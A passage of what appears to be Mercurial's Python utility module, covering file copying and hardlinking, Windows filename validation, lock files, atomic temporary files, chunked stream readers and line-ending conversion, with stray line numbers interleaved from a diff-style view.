    container objects (the number being defined by gc.get_threshold()) are
    allocated even when marked not to be tracked by the collector. Tracking has
    no effect on when GCs are triggered, only on what objects the GC looks
    into. As a workaround, disable GC while building complex (huge)
    containers.

    This garbage collector issue have been fixed in 2.7. But it still affect
    CPython's performance.
    """

    def wrapper(*args, **kwargs):
        # Remember whether GC was on so we never enable it behind the
        # caller's back.
        wasenabled = gc.isenabled()
        gc.disable()
        try:
            return func(*args, **kwargs)
        finally:
            if wasenabled:
                gc.enable()

    return wrapper
1839
1839
1840
1840
# On PyPy the collector behaves differently and disabling it is a
# pessimization, so make nogc a no-op pass-through decorator there.
if pycompat.ispypy:
    # PyPy runs slower with gc disabled
    nogc = lambda x: x
1844
1844
1845
1845
def pathto(root, n1, n2):
    # type: (bytes, bytes, bytes) -> bytes
    """return the relative path from one place to another.
    root should use os.sep to separate directories
    n1 should use os.sep to separate directories
    n2 should use "/" to separate directories
    returns an os.sep-separated path.

    If n1 is a relative path, it's assumed it's
    relative to root.
    n2 should always be relative to root.
    """
    if not n1:
        return localpath(n2)
    if os.path.isabs(n1):
        if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
            # different drives: no relative path exists, fall back to
            # an absolute path under root
            return os.path.join(root, localpath(n2))
        n2 = b'/'.join((pconvert(root), n2))
    fromparts = splitpath(n1)
    toparts = n2.split(b'/')
    # drop the longest common leading run of components
    common = 0
    while (
        common < len(fromparts)
        and common < len(toparts)
        and fromparts[common] == toparts[common]
    ):
        common += 1
    # climb out of what remains of n1, then descend into n2
    up = [b'..'] * (len(fromparts) - common)
    return pycompat.ossep.join(up + toparts[common:]) or b'.'
1872
1872
1873
1873
def checksignature(func, depth=1):
    '''wrap a function with code to check for calling errors'''

    def check(*args, **kwargs):
        try:
            return func(*args, **kwargs)
        except TypeError:
            # a TypeError raised exactly ``depth`` frames deep means the
            # call into ``func`` itself failed (bad argument list), not
            # some nested call within its body
            frames = traceback.extract_tb(sys.exc_info()[2])
            if len(frames) == depth:
                raise error.SignatureError
            raise

    return check
1886
1886
1887
1887
# a whitelist of known filesystems where hardlink works reliably
_hardlinkfswhitelist = {
    b'apfs',
    b'btrfs',
    b'ext2',
    b'ext3',
    b'ext4',
    b'hfs',
    b'jfs',
    b'NTFS',
    b'reiserfs',
    b'tmpfs',
    b'ufs',
    b'xfs',
    b'zfs',
}
1904
1904
1905
1905
def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
    """copy a file, preserving mode and optionally other stat info like
    atime/mtime

    checkambig argument is used with filestat, and is useful only if
    destination file is guarded by any lock (e.g. repo.lock or
    repo.wlock).

    copystat and checkambig should be exclusive.
    """
    assert not (copystat and checkambig)
    oldstat = None
    if os.path.lexists(dest):
        if checkambig:
            # remember the stat of the file being replaced so mtime
            # ambiguity can be detected (and fixed up) after the copy
            oldstat = checkambig and filestat.frompath(dest)
        unlink(dest)
    if hardlink:
        # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
        # unless we are confident that dest is on a whitelisted filesystem.
        try:
            fstype = getfstype(os.path.dirname(dest))
        except OSError:
            fstype = None
        if fstype not in _hardlinkfswhitelist:
            hardlink = False
    if hardlink:
        try:
            oslink(src, dest)
            return
        except (IOError, OSError):
            pass  # fall back to normal copy
    if os.path.islink(src):
        os.symlink(os.readlink(src), dest)
        # copytime is ignored for symlinks, but in general copytime isn't needed
        # for them anyway
    else:
        try:
            shutil.copyfile(src, dest)
            if copystat:
                # copystat also copies mode
                shutil.copystat(src, dest)
            else:
                shutil.copymode(src, dest)
            if oldstat and oldstat.stat:
                newstat = filestat.frompath(dest)
                if newstat.isambig(oldstat):
                    # stat of copied file is ambiguous to original one;
                    # advance mtime by one second (kept in the positive
                    # 31-bit range) so the change remains detectable
                    advanced = (
                        oldstat.stat[stat.ST_MTIME] + 1
                    ) & 0x7FFFFFFF
                    os.utime(dest, (advanced, advanced))
        except shutil.Error as inst:
            raise error.Abort(stringutil.forcebytestr(inst))
1959
1959
1960
1960
def copyfiles(src, dst, hardlink=None, progress=None):
    """Copy a directory tree using hardlinks if possible.

    Returns a (hardlink, count) pair: whether hardlinking is still in
    effect, and the number of files processed.
    """
    num = 0

    def settopic():
        # label the progress bar according to the copy strategy in use
        if progress:
            progress.topic = _(b'linking') if hardlink else _(b'copying')

    if os.path.isdir(src):
        if hardlink is None:
            # hardlinking is only possible within one device
            hardlink = (
                os.stat(src).st_dev == os.stat(os.path.dirname(dst)).st_dev
            )
        settopic()
        os.mkdir(dst)
        for name, kind in listdir(src):
            srcname = os.path.join(src, name)
            dstname = os.path.join(dst, name)
            hardlink, n = copyfiles(srcname, dstname, hardlink, progress)
            num += n
    else:
        if hardlink is None:
            hardlink = (
                os.stat(os.path.dirname(src)).st_dev
                == os.stat(os.path.dirname(dst)).st_dev
            )
        settopic()

        if hardlink:
            try:
                oslink(src, dst)
            except (IOError, OSError):
                # linking failed: disable it for the rest of the tree and
                # copy this file instead
                hardlink = False
                shutil.copy(src, dst)
        else:
            shutil.copy(src, dst)
        num += 1
        if progress:
            progress.increment()

    return hardlink, num
2002
2002
2003
2003
# Windows reserved device names; a path component whose stem (the part
# before the first b'.') matches one of these, case-insensitively, is
# rejected by checkwinfilename() below.
_winreservednames = {
    b'con',
    b'prn',
    b'aux',
    b'nul',
    b'com1',
    b'com2',
    b'com3',
    b'com4',
    b'com5',
    b'com6',
    b'com7',
    b'com8',
    b'com9',
    b'lpt1',
    b'lpt2',
    b'lpt3',
    b'lpt4',
    b'lpt5',
    b'lpt6',
    b'lpt7',
    b'lpt8',
    b'lpt9',
}
# characters that may not appear anywhere in a Windows file name
_winreservedchars = b':*?"<>|'
2029
2029
2030
2030
def checkwinfilename(path):
    # type: (bytes) -> Optional[bytes]
    r"""Check that the base-relative path is a valid filename on Windows.
    Returns None if the path is ok, or a UI string describing the problem.

    >>> checkwinfilename(b"just/a/normal/path")
    >>> checkwinfilename(b"foo/bar/con.xml")
    "filename contains 'con', which is reserved on Windows"
    >>> checkwinfilename(b"foo/con.xml/bar")
    "filename contains 'con', which is reserved on Windows"
    >>> checkwinfilename(b"foo/bar/xml.con")
    >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
    "filename contains 'AUX', which is reserved on Windows"
    >>> checkwinfilename(b"foo/bar/bla:.txt")
    "filename contains ':', which is reserved on Windows"
    >>> checkwinfilename(b"foo/bar/b\07la.txt")
    "filename contains '\\x07', which is invalid on Windows"
    >>> checkwinfilename(b"foo/bar/bla ")
    "filename ends with ' ', which is not allowed on Windows"
    >>> checkwinfilename(b"../bar")
    >>> checkwinfilename(b"foo\\")
    "filename ends with '\\', which is invalid on Windows"
    >>> checkwinfilename(b"foo\\/bar")
    "directory name ends with '\\', which is invalid on Windows"
    """
    if path.endswith(b'\\'):
        return _(b"filename ends with '\\', which is invalid on Windows")
    if b'\\/' in path:
        return _(b"directory name ends with '\\', which is invalid on Windows")
    # validate each path component individually
    for n in path.replace(b'\\', b'/').split(b'/'):
        if not n:
            continue
        for c in _filenamebytestr(n):
            if c in _winreservedchars:
                return (
                    _(
                        b"filename contains '%s', which is reserved "
                        b"on Windows"
                    )
                    % c
                )
            # control characters (bytes 0-31) are never valid
            if ord(c) <= 31:
                return _(
                    b"filename contains '%s', which is invalid on Windows"
                ) % stringutil.escapestr(c)
        # reserved device names apply to the part before the first dot
        base = n.split(b'.')[0]
        if base and base.lower() in _winreservednames:
            return (
                _(b"filename contains '%s', which is reserved on Windows")
                % base
            )
        # a component may not end with a dot or a space; the b'.' and
        # b'..' path components themselves are allowed
        t = n[-1:]
        if t in b'. ' and n not in b'..':
            return (
                _(
                    b"filename ends with '%s', which is not allowed "
                    b"on Windows"
                )
                % t
            )
2091
2091
2092
2092
# preferred high-resolution timer; time.perf_counter is probed with
# getattr because it does not exist on old interpreters, with
# platform-specific fallbacks chosen below
timer = getattr(time, "perf_counter", None)

if pycompat.iswindows:
    checkosfilename = checkwinfilename
    if not timer:
        timer = time.clock
else:
    # mercurial.windows doesn't have platform.checkosfilename
    checkosfilename = platform.checkosfilename  # pytype: disable=module-attr
    if not timer:
        timer = time.time
2104
2104
2105
2105
def makelock(info, pathname):
    """Create a lock file atomically if possible

    The lock is preferably created as a symlink whose target encodes
    ``info`` (atomic at the OS level).  When symlinks are unavailable,
    fall back to exclusively creating a regular file containing ``info``.

    This may leave a stale lock file if symlink isn't supported and signal
    interrupt is enabled.
    """
    try:
        return os.symlink(info, pathname)
    except OSError as why:
        if why.errno == errno.EEXIST:
            raise
        # any other error (e.g. filesystem without symlink support):
        # fall through to the regular-file strategy
    except AttributeError:  # no symlink in os
        pass

    flags = os.O_CREAT | os.O_WRONLY | os.O_EXCL | getattr(os, 'O_BINARY', 0)
    ld = os.open(pathname, flags)
    try:
        # previously the descriptor leaked when os.write() failed; always
        # close it
        os.write(ld, info)
    finally:
        os.close(ld)
2124
2124
2125
2125
def readlock(pathname):
    # type: (bytes) -> bytes
    # Read the info stored in a lock file, whether it was created as a
    # symlink or as a regular file.
    try:
        return readlink(pathname)
    except OSError as why:
        if why.errno not in (errno.EINVAL, errno.ENOSYS):
            raise
        # EINVAL: not a symlink; ENOSYS: symlinks unsupported — in both
        # cases the lock must be a regular file, read it below
    except AttributeError:  # no symlink in os
        pass
    with posixfile(pathname, b'rb') as fp:
        return fp.read()
2137
2137
2138
2138
def fstat(fp):
    '''stat file object that may not have fileno method.'''
    try:
        fd = fp.fileno()
    except AttributeError:
        # file-like wrapper without a descriptor: stat it by name
        return os.stat(fp.name)
    return os.fstat(fd)
2145
2145
2146
2146
2147 # File system features
2147 # File system features
2148
2148
2149
2149
def fscasesensitive(path):
    # type: (bytes) -> bool
    """
    Return true if the given path is on a case-sensitive filesystem

    Requires a path (like /foo/.hg) ending with a foldable final
    directory component.
    """
    original = os.lstat(path)
    dirname, basename = os.path.split(path)
    folded = basename.upper()
    if folded == basename:
        folded = basename.lower()
    if folded == basename:
        # the name has no letters to fold: no evidence against sensitivity
        return True
    try:
        other = os.lstat(os.path.join(dirname, folded))
    except OSError:
        # the case-flipped spelling doesn't exist: case matters here
        return True
    # identical stat under both spellings means a case-insensitive fs
    return other != original
2173
2173
2174
2174
# identity by default; replaced with pycompat.sysstr by _re._checkre2 when
# the installed re2 binding only accepts native (unicode) strings
_re2_input = lambda x: x
try:
    import re2  # pytype: disable=import-error

    # None means "availability not probed yet"; _re._checkre2 resolves it
    _re2 = None
except ImportError:
    _re2 = False
2182
2182
2183
class _re(object):
    """Facade selecting between the ``re2`` and stdlib ``re`` engines.

    re2 is used when it is importable, functional, and the pattern/flags
    are compatible with it; everything else falls back to the stdlib
    module (imported as ``remod``).
    """

    def _checkre2(self):
        # Probe the re2 binding once and record the outcome in the
        # module-level ``_re2`` / ``_re2_input`` globals.
        global _re2
        global _re2_input
        try:
            # check if match works, see issue3964
            check_pattern = br'\[([^\[]+)\]'
            check_input = b'[ui]'
            _re2 = bool(re2.match(check_pattern, check_input))
        except ImportError:
            _re2 = False
        except TypeError:
            # the `pyre-2` project provides a re2 module that accepts bytes
            # the `fb-re2` project provides a re2 module that accepts sysstr
            check_pattern = pycompat.sysstr(check_pattern)
            check_input = pycompat.sysstr(check_input)
            _re2 = bool(re2.match(check_pattern, check_input))
            # remember that patterns must be converted to native str
            _re2_input = pycompat.sysstr

    def compile(self, pat, flags=0):
        """Compile a regular expression, using re2 if possible

        For best performance, use only re2-compatible regexp features. The
        only flags from the re module that are re2-compatible are
        IGNORECASE and MULTILINE."""
        if _re2 is None:
            self._checkre2()
        if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
            # re2 takes no flags argument: encode them into the pattern
            if flags & remod.IGNORECASE:
                pat = b'(?i)' + pat
            if flags & remod.MULTILINE:
                pat = b'(?m)' + pat
            try:
                return re2.compile(_re2_input(pat))
            except re2.error:
                pass
        return remod.compile(pat, flags)

    @propertycache
    def escape(self):
        """Return the version of escape corresponding to self.compile.

        This is imperfect because whether re2 or re is used for a particular
        function depends on the flags, etc, but it's the best we can do.
        """
        global _re2
        if _re2 is None:
            self._checkre2()
        if _re2:
            return re2.escape
        else:
            return remod.escape
2225
2236
2226
2237
# module-level singleton used as the drop-in regexp engine selector
re = _re()

# per-directory cache of {normcased name: on-disk name}, used by fspath()
_fspathcache = {}
2241
2231
2242
def fspath(name, root):
    # type: (bytes, bytes) -> bytes
    """Get name in the case stored in the filesystem

    The name should be relative to root, and be normcase-ed for efficiency.

    Note that this function is unnecessary, and should not be
    called, for case-sensitive filesystems (simply because it's expensive).

    The root should be normcase-ed, too.
    """

    def _makefspathcacheentry(dir):
        # map normcased entry names to their actual on-disk spelling
        return {normcase(n): n for n in os.listdir(dir)}

    seps = pycompat.ossep
    if pycompat.osaltsep:
        seps = seps + pycompat.osaltsep
    # Protect backslashes. This gets silly very quickly.
    # (bytes.replace returns a new object; the previous code discarded the
    # result, leaving b'\\' unescaped inside the character classes below)
    seps = seps.replace(b'\\', b'\\\\')
    pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
    dir = os.path.normpath(root)
    result = []
    for part, sep in pattern.findall(name):
        if sep:
            # runs of separators pass through unchanged
            result.append(sep)
            continue

        if dir not in _fspathcache:
            _fspathcache[dir] = _makefspathcacheentry(dir)
        contents = _fspathcache[dir]

        found = contents.get(part)
        if not found:
            # retry "once per directory" per "dirstate.walk" which
            # may take place for each patches of "hg qpush", for example
            _fspathcache[dir] = contents = _makefspathcacheentry(dir)
            found = contents.get(part)

        result.append(found or part)
        dir = os.path.join(dir, part)

    return b''.join(result)
2275
2286
2276
2287
def checknlink(testfile):
    # type: (bytes) -> bool
    '''check whether hardlink count reporting works properly'''

    # testfile may be open, so we need a separate file for checking to
    # work around issue2543 (or testfile may get lost on Samba shares)
    f1, f2, fp = None, None, None
    try:
        fd, f1 = pycompat.mkstemp(
            prefix=b'.%s-' % os.path.basename(testfile),
            suffix=b'1~',
            dir=os.path.dirname(testfile),
        )
        os.close(fd)
        f2 = b'%s2~' % f1[:-2]

        oslink(f1, f2)
        # nlinks() may behave differently for files on Windows shares if
        # the file is open.
        fp = posixfile(f2)
        return nlinks(f2) > 1
    except OSError:
        return False
    finally:
        # best-effort cleanup of the two probe files
        if fp is not None:
            fp.close()
        for f in (f1, f2):
            try:
                if f is not None:
                    os.unlink(f)
            except OSError:
                pass
2309
2320
2310
2321
def endswithsep(path):
    # type: (bytes) -> bool
    '''Check path ends with os.sep or os.altsep.'''
    if path.endswith(pycompat.ossep):
        return True
    altsep = pycompat.osaltsep
    # altsep may be empty/None on platforms with a single separator
    return bool(altsep and path.endswith(altsep))
2319
2330
2320
2331
def splitpath(path):
    # type: (bytes) -> List[bytes]
    """Split path by os.sep.
    Note that this function does not use os.altsep because this is
    an alternative of simple "xxx.split(os.sep)".
    It is recommended to use os.path.normpath() before using this
    function if needed."""
    return path.split(pycompat.ossep)
2329
2340
2330
2341
def mktempcopy(name, emptyok=False, createmode=None, enforcewritable=False):
    """Create a temporary file with the same contents from name

    The permission bits are copied from the original file.

    If the temporary file is going to be truncated immediately, you
    can use emptyok=True as an optimization.

    Returns the name of the temporary file.
    """
    d, fn = os.path.split(name)
    fd, temp = pycompat.mkstemp(prefix=b'.%s-' % fn, suffix=b'~', dir=d)
    os.close(fd)
    # Temporary files are created with mode 0600, which is usually not
    # what we want. If the original file already exists, just copy
    # its mode. Otherwise, manually obey umask.
    copymode(name, temp, createmode, enforcewritable)

    if emptyok:
        return temp
    try:
        try:
            ifp = posixfile(name, b"rb")
        except IOError as inst:
            if inst.errno == errno.ENOENT:
                # source is missing: the (empty) temp file is the copy
                return temp
            if not getattr(inst, 'filename', None):
                inst.filename = name
            raise
        ofp = posixfile(temp, b"wb")
        for chunk in filechunkiter(ifp):
            ofp.write(chunk)
        ifp.close()
        ofp.close()
    except:  # re-raises
        # don't leave a partially written temporary file behind
        try:
            os.unlink(temp)
        except OSError:
            pass
        raise
    return temp
2372
2383
2373
2384
class filestat(object):
    """help to exactly detect change of a file

    'stat' attribute is result of 'os.stat()' if specified 'path'
    exists. Otherwise, it is None. This can avoid preparative
    'exists()' examination on client side of this class.
    """

    def __init__(self, stat):
        # 'stat' is an os.stat_result, or None when the path didn't exist
        self.stat = stat

    @classmethod
    def frompath(cls, path):
        """Build a filestat for 'path'; a missing file yields stat=None."""
        try:
            stat = os.stat(path)
        except OSError as err:
            # only ENOENT means "file absent"; anything else is a real error
            if err.errno != errno.ENOENT:
                raise
            stat = None
        return cls(stat)

    @classmethod
    def fromfp(cls, fp):
        """Build a filestat from an already-open file object via fstat()."""
        stat = os.fstat(fp.fileno())
        return cls(stat)

    # defining __eq__ below would otherwise disable hashing; keep the
    # default identity-based hash
    __hash__ = object.__hash__

    def __eq__(self, old):
        try:
            # if ambiguity between stat of new and old file is
            # avoided, comparison of size, ctime and mtime is enough
            # to exactly detect change of a file regardless of platform
            return (
                self.stat.st_size == old.stat.st_size
                and self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME]
                and self.stat[stat.ST_MTIME] == old.stat[stat.ST_MTIME]
            )
        except AttributeError:
            pass
        try:
            # both sides may represent a missing file (stat is None)
            return self.stat is None and old.stat is None
        except AttributeError:
            # 'old' is not a filestat-like object
            return False

    def isambig(self, old):
        """Examine whether new (= self) stat is ambiguous against old one

        "S[N]" below means stat of a file at N-th change:

        - S[n-1].ctime < S[n].ctime: can detect change of a file
        - S[n-1].ctime == S[n].ctime
          - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
          - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
          - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
        - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)

        Case (*2) above means that a file was changed twice or more at
        same time in sec (= S[n-1].ctime), and comparison of timestamp
        is ambiguous.

        Base idea to avoid such ambiguity is "advance mtime 1 sec, if
        timestamp is ambiguous".

        But advancing mtime only in case (*2) doesn't work as
        expected, because naturally advanced S[n].mtime in case (*1)
        might be equal to manually advanced S[n-1 or earlier].mtime.

        Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
        treated as ambiguous regardless of mtime, to avoid overlooking
        by confliction between such mtime.

        Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
        S[n].mtime", even if size of a file isn't changed.
        """
        try:
            return self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME]
        except AttributeError:
            # one side has no stat (missing file): not ambiguous
            return False

    def avoidambig(self, path, old):
        """Change file stat of specified path to avoid ambiguity

        'old' should be previous filestat of 'path'.

        This skips avoiding ambiguity, if a process doesn't have
        appropriate privileges for 'path'. This returns False in this
        case.

        Otherwise, this returns True, as "ambiguity is avoided".
        """
        # bump mtime by one second, clamped into signed 32-bit range
        advanced = (old.stat[stat.ST_MTIME] + 1) & 0x7FFFFFFF
        try:
            os.utime(path, (advanced, advanced))
        except OSError as inst:
            if inst.errno == errno.EPERM:
                # utime() on the file created by another user causes EPERM,
                # if a process doesn't have appropriate privileges
                return False
            raise
        return True

    def __ne__(self, other):
        # py2 does not derive __ne__ from __eq__; define it explicitly
        return not self == other
2478
2489
2479
2490
class atomictempfile(object):
    """writable file object that atomically updates a file

    All writes will go to a temporary copy of the original file. Call
    close() when you are done writing, and atomictempfile will rename
    the temporary copy to the original name, making the changes
    visible. If the object is destroyed without being closed, all your
    writes are discarded.

    checkambig argument of constructor is used with filestat, and is
    useful only if target file is guarded by any lock (e.g. repo.lock
    or repo.wlock).
    """

    def __init__(self, name, mode=b'w+b', createmode=None, checkambig=False):
        self.__name = name  # permanent name
        # temporary working copy; starts empty when opened for write
        self._tempname = mktempcopy(
            name,
            emptyok=(b'w' in mode),
            createmode=createmode,
            enforcewritable=(b'w' in mode),
        )

        self._fp = posixfile(self._tempname, mode)
        self._checkambig = checkambig

        # delegated methods
        self.read = self._fp.read
        self.write = self._fp.write
        self.seek = self._fp.seek
        self.tell = self._fp.tell
        self.fileno = self._fp.fileno

    def close(self):
        """Publish the writes: rename the temp file over the real name.

        With checkambig, also detect and fix an ambiguous (same-second)
        timestamp on the renamed file so cache validation stays exact.
        """
        if not self._fp.closed:
            self._fp.close()
            filename = localpath(self.__name)
            # oldstat is False unless checkambig was requested
            oldstat = self._checkambig and filestat.frompath(filename)
            if oldstat and oldstat.stat:
                rename(self._tempname, filename)
                newstat = filestat.frompath(filename)
                if newstat.isambig(oldstat):
                    # stat of changed file is ambiguous to original one
                    advanced = (oldstat.stat[stat.ST_MTIME] + 1) & 0x7FFFFFFF
                    os.utime(filename, (advanced, advanced))
            else:
                rename(self._tempname, filename)

    def discard(self):
        """Throw the writes away: delete the temp file without renaming."""
        if not self._fp.closed:
            try:
                os.unlink(self._tempname)
            except OSError:
                pass
            self._fp.close()

    def __del__(self):
        if safehasattr(self, '_fp'):  # constructor actually did something
            self.discard()

    def __enter__(self):
        return self

    def __exit__(self, exctype, excvalue, traceback):
        # keep the changes only when the with-block exits cleanly
        if exctype is not None:
            self.discard()
        else:
            self.close()
2548
2559
2549
2560
def unlinkpath(f, ignoremissing=False, rmdir=True):
    # type: (bytes, bool, bool) -> None
    """Remove the file at ``f`` and prune parent directories left empty.

    With ``ignoremissing`` a nonexistent file is tolerated; otherwise the
    unlink error propagates.  With ``rmdir`` the now-possibly-empty parent
    directories are removed on a best-effort basis.
    """
    remove = tryunlink if ignoremissing else unlink
    remove(f)
    if not rmdir:
        return
    # try removing directories that might now be empty
    try:
        removedirs(os.path.dirname(f))
    except OSError:
        pass
2563
2574
2564
2575
def tryunlink(f):
    # type: (bytes) -> None
    """Remove ``f`` if it exists; a missing file is silently ignored."""
    try:
        unlink(f)
    except OSError as err:
        # only "no such file" is tolerated; re-raise any other failure
        if err.errno != errno.ENOENT:
            raise
2573
2584
2574
2585
def makedirs(name, mode=None, notindexed=False):
    # type: (bytes, Optional[int], bool) -> None
    """recursive directory creation with parent mode inheritance

    Newly created directories are marked as "not to be indexed by
    the content indexing service", if ``notindexed`` is specified
    for "write" mode access.
    """
    try:
        makedir(name, notindexed)
    except OSError as err:
        if err.errno == errno.EEXIST:
            # directory already exists: nothing to do
            return
        if err.errno != errno.ENOENT or not name:
            raise
        # a parent is missing: create ancestors first, then retry
        parent = os.path.dirname(os.path.abspath(name))
        if parent == name:
            # reached the filesystem root without succeeding
            raise
        makedirs(parent, mode, notindexed)
        try:
            makedir(name, notindexed)
        except OSError as err:
            # Catch EEXIST to handle races
            if err.errno == errno.EEXIST:
                return
            raise
    # apply the explicit mode only to the leaf directory, as before
    if mode is not None:
        os.chmod(name, mode)
2603
2614
2604
2615
def readfile(path):
    # type: (bytes) -> bytes
    """Return the whole binary content of the file at ``path``."""
    fp = open(path, b'rb')
    try:
        return fp.read()
    finally:
        fp.close()
2609
2620
2610
2621
def writefile(path, text):
    # type: (bytes, bytes) -> None
    """Replace the content of the file at ``path`` with ``text``."""
    fp = open(path, b'wb')
    try:
        fp.write(text)
    finally:
        fp.close()
2615
2626
2616
2627
def appendfile(path, text):
    # type: (bytes, bytes) -> None
    """Append ``text`` to the end of the file at ``path``."""
    fp = open(path, b'ab')
    try:
        fp.write(text)
    finally:
        fp.close()
2621
2632
2622
2633
class chunkbuffer(object):
    """Allow arbitrary sized chunks of data to be efficiently read from an
    iterator over chunks of arbitrary size."""

    def __init__(self, in_iter):
        """in_iter is the iterator that's iterating over the input chunks."""

        def splitbig(chunks):
            # cap individual chunks at 256KB so read() never has to slice
            # enormous strings; chunks up to 1MB pass through untouched
            for chunk in chunks:
                if len(chunk) <= 2 ** 20:
                    yield chunk
                    continue
                pos = 0
                while pos < len(chunk):
                    end = pos + 2 ** 18
                    yield chunk[pos:end]
                    pos = end

        self.iter = splitbig(in_iter)
        self._queue = collections.deque()
        # how many bytes of the queue's head chunk were already consumed
        self._chunkoffset = 0

    def read(self, l=None):
        """Read L bytes of data from the iterator of chunks of data.
        Returns less than L bytes if the iterator runs dry.

        If size parameter is omitted, read everything"""
        if l is None:
            return b''.join(self.iter)

        left = l
        parts = []
        queue = self._queue
        while left > 0:
            # top the queue back up to ~256KB when it runs dry
            if not queue:
                budget = 2 ** 18
                for chunk in self.iter:
                    queue.append(chunk)
                    budget -= len(chunk)
                    if budget <= 0:
                        break
                if not queue:
                    # source exhausted: return a short read
                    break

            # Consume from the head chunk in place, tracking the offset
            # ourselves rather than re-queueing trimmed chunks; this avoids
            # extra deque mutations and string copies on partial reads.
            chunk = queue[0]
            offset = self._chunkoffset
            avail = len(chunk) - offset

            if left >= avail:
                # take everything remaining in this chunk
                queue.popleft()
                # slicing chunk[0:] would copy, so special-case offset 0
                parts.append(chunk if offset == 0 else chunk[offset:])
                self._chunkoffset = 0
                left -= avail
            else:
                # take only a slice; the head chunk stays queued
                parts.append(chunk[offset : offset + left])
                self._chunkoffset = offset + left
                left = 0

        return b''.join(parts)
2704
2715
2705
2716
def filechunkiter(f, size=131072, limit=None):
    """Create a generator that produces the data in the file size
    (default 131072) bytes at a time, up to optional limit (default is
    to read all data). Chunks may be less than size bytes if the
    chunk is the last chunk in the file, or the file is a socket or
    some other type of file that sometimes reads less data than is
    requested."""
    assert size >= 0
    assert limit is None or limit >= 0
    while True:
        nbytes = size if limit is None else min(limit, size)
        # a zero-byte request short-circuits without touching the file
        s = nbytes and f.read(nbytes)
        if not s:
            break
        if limit:
            limit -= len(s)
        yield s
2726
2737
2727
2738
class cappedreader(object):
    """A file object proxy that allows reading up to N bytes.

    Given a source file object, instances of this type allow reading up to
    N bytes from that source file object. Attempts to read past the allowed
    limit are treated as EOF.

    It is assumed that I/O is not performed on the original file object
    in addition to I/O that is performed by this instance. If there is,
    state tracking will get out of sync and unexpected results will ensue.
    """

    def __init__(self, fh, limit):
        """Allow reading up to <limit> bytes from <fh>."""
        self._fh = fh
        self._left = limit

    def read(self, n=-1):
        remaining = self._left
        # the cap is exhausted: behave like EOF
        if not remaining:
            return b''

        # a negative size means "read to the cap"
        if n < 0:
            n = remaining

        data = self._fh.read(min(n, remaining))
        self._left = remaining - len(data)
        assert self._left >= 0

        return data

    def readinto(self, b):
        res = self.read(len(b))
        if res is None:
            return None

        b[0 : len(res)] = res
        return len(res)
2765
2776
2766
2777
def unitcountfn(*unittable):
    """Return a function that renders a readable count of some quantity.

    ``unittable`` rows are ``(multiplier, divisor, format)`` tuples; the
    first row whose threshold (``divisor * multiplier``) the magnitude
    reaches wins, and the final row formats values below every threshold.
    """

    def render(count):
        magnitude = abs(count)
        for multiplier, divisor, fmt in unittable:
            if magnitude >= divisor * multiplier:
                return fmt % (count / float(divisor))
        # smaller than every threshold: fall back to the last row, unscaled
        return unittable[-1][2] % count

    return render
2777
2788
2778
2789
def processlinerange(fromline, toline):
    # type: (int, int) -> Tuple[int, int]
    """Check that linerange <fromline>:<toline> makes sense and return a
    0-based range.

    >>> processlinerange(10, 20)
    (9, 20)

    An empty-or-reversed range or a nonpositive ``fromline`` raises
    ``error.ParseError``.
    """
    if toline < fromline:
        raise error.ParseError(_(b"line range must be positive"))
    if fromline < 1:
        raise error.ParseError(_(b"fromline must be strictly positive"))
    # 1-based inclusive start becomes a 0-based half-open start
    return fromline - 1, toline
2800
2811
2801
2812
# Pre-built renderer for byte counts: three rows per unit keep roughly
# three significant digits (e.g. "1.23 GB", "12.3 MB", "123 KB"), with a
# plain byte count as the final fallback.
bytecount = unitcountfn(
    (100, 1 << 30, _(b'%.0f GB')),
    (10, 1 << 30, _(b'%.1f GB')),
    (1, 1 << 30, _(b'%.2f GB')),
    (100, 1 << 20, _(b'%.0f MB')),
    (10, 1 << 20, _(b'%.1f MB')),
    (1, 1 << 20, _(b'%.2f MB')),
    (100, 1 << 10, _(b'%.0f KB')),
    (10, 1 << 10, _(b'%.1f KB')),
    (1, 1 << 10, _(b'%.2f KB')),
    (1, 1, _(b'%.0f bytes')),
)
2814
2825
2815
2826
class transformingwriter(object):
    """Writable file proxy that pipes written data through ``encode``."""

    def __init__(self, fp, encode):
        # underlying writable file object and the bytes->bytes transform
        self._fp = fp
        self._encode = encode

    def write(self, data):
        # transform first, then delegate; return the underlying result
        return self._fp.write(self._encode(data))

    def flush(self):
        self._fp.flush()

    def close(self):
        self._fp.close()
2831
2842
2832
2843
# One logical EOL: an LF optionally preceded by a run of CRs (the CRs are
# folded into the terminator). Old Macintosh bare-CR endings are
# deliberately unsupported, so a CR with no following LF is left alone.
_eolre = remod.compile(br'\r*\n')


def tolf(s):
    # type: (bytes) -> bytes
    """Normalize every line ending in ``s`` to a bare LF."""
    return _eolre.sub(b'\n', s)


def tocrlf(s):
    # type: (bytes) -> bytes
    """Normalize every line ending in ``s`` to CRLF."""
    return _eolre.sub(b'\r\n', s)


def _crlfwriter(fp):
    """Wrap ``fp`` so that written data gets CRLF line endings."""
    return transformingwriter(fp, tocrlf)
2851
2862
2852
2863
# Pick the EOL conversion helpers matching the host platform's native line
# separator: when it is CRLF (Windows) convert to/from CRLF, otherwise the
# native form already uses LF and these become no-ops.
if pycompat.oslinesep == b'\r\n':
    tonativeeol = tocrlf
    fromnativeeol = tolf
    nativeeolwriter = _crlfwriter
else:
    tonativeeol = pycompat.identity
    fromnativeeol = pycompat.identity
    nativeeolwriter = pycompat.identity
2861
2872
if pyplatform.python_implementation() == b'CPython' and sys.version_info < (
    3,
    0,
):
    # There is an issue in CPython that some IO methods do not handle EINTR
    # correctly. The following table shows what CPython version (and functions)
    # are affected (buggy: has the EINTR bug, okay: otherwise):
    #
    #   | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
    #   --------------------------------------------------
    #    fp.__iter__ | buggy   | buggy           | okay
    #    fp.read*    | buggy   | okay [1]        | okay
    #
    # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
    #
